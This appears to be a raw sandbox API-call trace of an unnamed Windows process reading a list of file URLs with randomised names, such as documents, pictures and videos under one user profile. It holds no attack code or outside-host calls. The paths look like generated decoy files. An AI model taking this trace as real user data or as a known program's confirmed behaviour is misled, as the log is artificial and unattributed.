(_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned 1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned -1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned -1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned 1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned 1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.743] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned 1 [0085.743] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.743] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.743] SetFilePointer (in: hFile=0x9c, lDistanceToMove=26496, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6780 [0085.743] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.743] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/V27YtHjhtm5zniry.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots" [0085.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots") returned 104 [0085.744] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.744] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.744] SetFilePointer (in: hFile=0x9c, lDistanceToMove=26752, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6880 [0085.744] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.744] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/YSBwVDgi513gVe8gdts0.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf" [0085.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf") returned 75 [0085.744] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.744] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.744] SetFilePointer (in: hFile=0x9c, lDistanceToMove=27008, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6980 [0085.744] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.744] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/Ed35v.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv" [0085.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv") returned 60 [0085.744] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.744] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.744] SetFilePointer (in: hFile=0x9c, lDistanceToMove=27264, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6a80 [0085.744] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.744] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/l2ikFr.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx" [0085.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx") returned 76 [0085.744] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.744] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.744] SetFilePointer (in: hFile=0x9c, lDistanceToMove=27520, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6b80 [0085.744] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.745] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VtVzhjU6H4lQXexI9eF9.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg" [0085.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg") returned 68 [0085.745] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.745] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.745] SetFilePointer (in: hFile=0x9c, lDistanceToMove=27776, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6c80 [0085.745] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.745] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/RA1qXhAgR06tsse5SRl.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx" [0085.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx") returned 70 [0085.745] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.745] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.745] SetFilePointer (in: hFile=0x9c, lDistanceToMove=28032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6d80 [0085.745] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.745] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/0swDP%200JTayGezoJn.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf" [0085.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf") returned 74 [0085.745] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.745] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.745] SetFilePointer (in: hFile=0x9c, lDistanceToMove=28288, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6e80 [0085.745] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x180, lpOverlapped=0x0) returned 1 [0085.746] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/MSEz/nJ1uA7QN.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png" [0085.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png") returned 121 [0085.746] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.746] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.746] SetFilePointer (in: hFile=0x9c, lDistanceToMove=28672, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7000 [0085.746] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.746] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/glvVvpVEB1b9FqLag7.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots" [0085.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots") returned 68 [0085.746] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.746] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.746] SetFilePointer (in: hFile=0x9c, lDistanceToMove=28928, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7100 [0085.746] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.746] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/UeGk7xbr6-Krprckyd.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx" [0085.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx") returned 69 [0085.746] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.746] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.746] SetFilePointer (in: hFile=0x9c, lDistanceToMove=29184, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7200 [0085.746] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.747] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/kiPMxd08JtyRa4.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg" [0085.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg") returned 107 [0085.747] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.747] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.747] SetFilePointer (in: hFile=0x9c, lDistanceToMove=29440, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7300 [0085.747] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.747] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/Ix0knq7j3.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf" [0085.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf") returned 78 [0085.747] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.747] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.747] SetFilePointer (in: hFile=0x9c, lDistanceToMove=29696, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7400 [0085.747] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.747] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/JU_DZyRs7JfE4.pdf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf" [0085.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf") returned 63 [0085.747] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.747] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.747] SetFilePointer (in: hFile=0x9c, lDistanceToMove=29952, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7500 [0085.747] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.748] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/-53xiEmeE-e.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx" [0085.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx") returned 62 [0085.748] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.748] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.748] SetFilePointer (in: hFile=0x9c, lDistanceToMove=30208, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7600 [0085.748] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.748] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/kfHUhsL.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf" [0085.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf") returned 63 [0085.748] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.748] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.748] SetFilePointer (in: hFile=0x9c, lDistanceToMove=30464, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7700 [0085.748] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.749] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/1xFM.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx" [0085.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx") returned 93 [0085.749] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.749] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.749] SetFilePointer (in: hFile=0x9c, lDistanceToMove=30720, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7800 [0085.749] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.749] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/2OWth4htJ.pdf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf") 